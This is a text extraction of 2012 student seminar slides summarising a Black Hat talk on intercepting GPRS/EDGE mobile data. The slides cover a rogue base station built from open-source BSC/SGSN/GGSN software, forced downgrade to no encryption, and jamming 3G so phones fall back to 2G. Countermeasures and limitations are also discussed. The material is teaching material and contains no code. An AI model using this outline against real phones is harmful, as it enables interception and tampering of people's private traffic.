4MMSR-2011-2012-Student Seminar-A Practical Attack Against GPRS EDGE UMTS HSPA Mobile Data...

7/28/2019 4MMSR-2011-2012-Student Seminar-A Practical Attack Against GPRS EDGE UMTS HSPA Mobile Data Communications - David Perez, Jose Pico - Black-Hat DC 2011

1/19

A practical attack againstGPRS/EDGE/UMTS/HSPA mobile data

communications

Matiaz Ouine : [email protected]

Benot Raymond : [email protected]

ENSIMAG - 4MMSR : Network Security - Student Seminar 1 / 1720/03/2012

Keywords : GPRS, EDGE, UMTS, BTS, MS, authentication, encryption

David Perez - [email protected] Pico - [email protected]

Black Hat DC 2011 (Jan. 18-19)


2/19

Summary

Background Vocabulary

Presentation of the talk

Description of the GSM Architecture

Vulnerabilities Attack implementation

Possibilities offered by the attack

Countermeasures

Limitations

Conclusion

References


--------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------A practical attack against GPRS/EDGE/UMTS/HSPA mobile data communications Black Hat DC 2011 (Jan. 18-19)

David Perez - [email protected] Jose Pico - [email protected]


3/19

Papers authors

David Perez and Jose Pico

Co-Founders and Senior Security analysts at Taddong

Skills

Network

Web applications

Mobile communications

VoIP

Etc.

Last paper

New attack scenarios with rogue base stations at RootedCON2012 (3/03/2012)

20/03/2012 ENSIMAG - 4MMSR : Network Security - Student Seminar 3 / 17




4/19

Background - Vocabulary

Background of the talk Protocol stack

Vocabulary GPRS = 2G EDGE = 2,5G

UMTS = 3G HSPA = 3,5G (= 3G+)

MS = Mobile Station (ex: phone, tablet computer, computer with 3Gmodem, )

IMEI = unique identification number for 1 phone

IMSI = unique identification number for 1 SIM card

USIM key (Ki) = shared key between the SIM and the mobile phonecompany


Access Layer in UMTS

Non Access Layer in UMTS(Main subject of the talk)




5/19

Presentation of the talk

A practical attack againstGPRS/EDGE/UMTS/HSPA (2G/3G)mobile data communications

Budget < $10,000

Exploitation ofthree vulnerabilities of 2G/3G





6/19

Description of the GSM Architecture (1/2)


: Voice (ex : SMS/MMS/Voice Call): Data (ex : HTTP,DNS,VoIP,P2P,)




7/19

Description of the GSM Architecture (2/2)

Circuit switched

2 communications channels Up and Down

GSM medium access TDMA





8/19

Vulnerabilities

Lack of mutual authentication in GPRS/EDGE

Unidirectional authentication

MS (Mobile Station) authenticates to the BTS

Encryption algorithm

Negotiation of encryption algorithm

MS indicates its supported encryption algorithms (ex : GEA-0, GEA-1,)

BTS chooses one of those algorithms

Algorithm GEA-0 (= no encryption)

Fall back to GPRS/EDGE

UMTS/HSPA uses mutual authentication

Back to GSM/GPRS/EDGE network when UMTS/HSPA network isnot available




/


9/19

Attack implementation (1/3) Experimental setup


- OpenBSC implementsthe BSC, MSC and HLR

- OsmoSGSN implementsSGSN

- OpenGGSN implementsthe GGSN



ENSIMAG 4MMSR N t k S it St d t S i 10 / 1720/03/2012


10/19

Attack implementation (2/3) Description of each step

Position of the attacker

Be close enough to the target

Listen radio spectrum

Search a neighbour frequency of the real BTS frequencies

Configure to emit at the chosen frequency

Take the identity of the real BTS

Set up BTS to accept connection of the target

Identified by his IMSI / IMEI

Working uplink to the Internet Configure OsmoSGSN, OpenGGSN, routing tables

Power up BTS

Read / Modify / Redirect IP paquet send and received by the victim




ENSIMAG 4MMSR N t k S it St d t S i 11 / 1720/03/2012


11/19

Attack implementation (3/3)

Extension to 3G

Create interference in the UMTS frequencybands

Use a jammer

UMTS spectrum allocation in France (900 MHz and 2100MHz)

Exploit the 3rd vulnerability




ENSIMAG 4MMSR : Network Security Student Seminar 12 / 1720/03/2012


12/19

Possibilities offered by the attack Possibilities

Sniff traffic, redirecting traffic, compromising LAN,

Full man in the middle !

Security properties that are violated on the transmitted data

Confidentiality : attacker can read transmitted data Integrity : attacker can modify transmitted data

Authenticity : message not from the assumed sender (man in the middle)

Freshness : attacker can replay old transmitted data

Security properties that are violated on the user identity

Privacy : attacker can know victims private identity data

Security properties that are violated on the communication system

Availability : attacker can not serve all users

Traceability : the mobile phone company will not be able to list your actions




ENSIMAG 4MMSR : Network Security Student Seminar 13 / 1720/03/2012


13/19

Countermeasures (1/2)

Countermeasures

Use protocol from upper layer for ensuringendpoint authentication and encryption

(ex : SSL, IPsec,..) Use only UMTS/HSPA

Do not accept fall back to 2G

iPhone : Jailbreak Android / Windows Mobile / Symbian : Parameters

(only WCDMA)




Access Layer compromised

Must ensuring authenticationand encryption



14/19

AUTN number of the assumedHLR/BTS ?

YES => Step 3 NO => STOP

XRES = RES ?YES => Authentication OKNO => STOP

Countermeasures (2/2) UMTS authentication

Mutual authentication

UMTS encryption Data : UMTS Encryption Algorithm1

(UEA1), based on KASUMI

Symmetric encryption

Word : 64 bits

Key (=Ki=USIM Key) : 128 bits

20/03/2012 ENSIMAG 4MMSR : Network Security Student Seminar 14 / 17



UMTS Integrity MAC (Message Authentication Code)

Birthday paradox attack (2^33 paquetsneed => not realistic in UMTS)



15/19

Limitations

Limitations

Be close enough to the target

Have a budget of 10000$

Know the target in advance (IMEI and/or IMSI)

SMS/MMS/Voice call impossible

Why ? The attacker is not connected to the RTCP

network Hypothesis : use VoIP to get around this problem

(forward SMS/MMS/Voice call)

20/03/2012 ENSIMAG 4MMSR : Network Security Student Seminar 15 / 17





16/19

Conclusion

GPRS/EDGE architecture is insecure

Only client authentication

Negotiation of encryption

Be afraid of GPRS/EDGE data connections

UMTS is not impacted by this attack

Because ofmutual authentication

y 16 / 17





17/19

References

GSM architecture http://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-

Club_QoS_GPRS_12_03.ppt

UMTS frequency bands https://en.wikipedia.org/wiki/UMTS_frequency_bands

Security in UMTS Encryption in UMTS

http://sebastien.mougel.free.fr/download/securite_UMTS.ppt

Authentication and encryption in UMTS

http://freesecure.info/doc/securite-UMTS.pdf

http://www.tcs.hut.fi/Publications/knyberg/eccomas.pdf

Paper of the talk http://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdf

Book (Spanish) Hacking y seguridad en comunicaciones mviles GSM/GPRS/UMTS/LTE, Jos Pic Garca

and David Prez Conde

y



20/03/2012 ENSIMAG - 4MMSR : Network Security - Student Seminar 17-1 / 17
http://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttps://en.wikipedia.org/wiki/UMTS_frequency_bandshttp://sebastien.mougel.free.fr/download/securite_UMTS.ppthttp://freesecure.info/doc/securite-UMTS.pdfhttp://www.tcs.hut.fi/Publications/knyberg/eccomas.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.taddong.com/docs/BlackHat_DC_2011_Perez-Pico_Mobile_Attacks-wp.pdfhttp://www.tcs.hut.fi/Publications/knyberg/eccomas.pdfhttp://freesecure.info/doc/securite-UMTS.pdfhttp://freesecure.info/doc/securite-UMTS.pdfhttp://freesecure.info/doc/securite-UMTS.pdfhttp://sebastien.mougel.free.fr/download/securite_UMTS.ppthttps://en.wikipedia.org/wiki/UMTS_frequency_bandshttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppthttp://www.afutt.org/Qostic/qostic5/MOB-CN-DFF-AFUTT-030025-Club_QoS_GPRS_12_03.ppt


18/19

Questions ?!?!

Attack with the VoIP hypothesis

Appareil A

Appareil B

Case 1 :A calls B, attacker forwardsthe call into a VoIP call

=> Attack OK

Data : HTTP, SMS/MMS/Voice Call : Forward VoIP

Case 2 :B calls A, RTCP cant find A.

B hits the voice mail of A.

=> Attack KO

20/03/2012 ENSIMAG - 4MMSR : Network Security - Student Seminar 17-2 / 17


19/19

Questions ?!?!

GSM Cells

One cell has 1 frequency

Neighbour cells have different frequencies

Cell A

GSM Neighbour Cellof A

Date post:	03-Apr-2018
Category:	Documents
Upload:	ali-shehryar
View:	310 times
Download:	0 times

4MMSR-2011-2012-Student Seminar-A Practical Attack Against GPRS EDGE UMTS HSPA Mobile Data...

Documents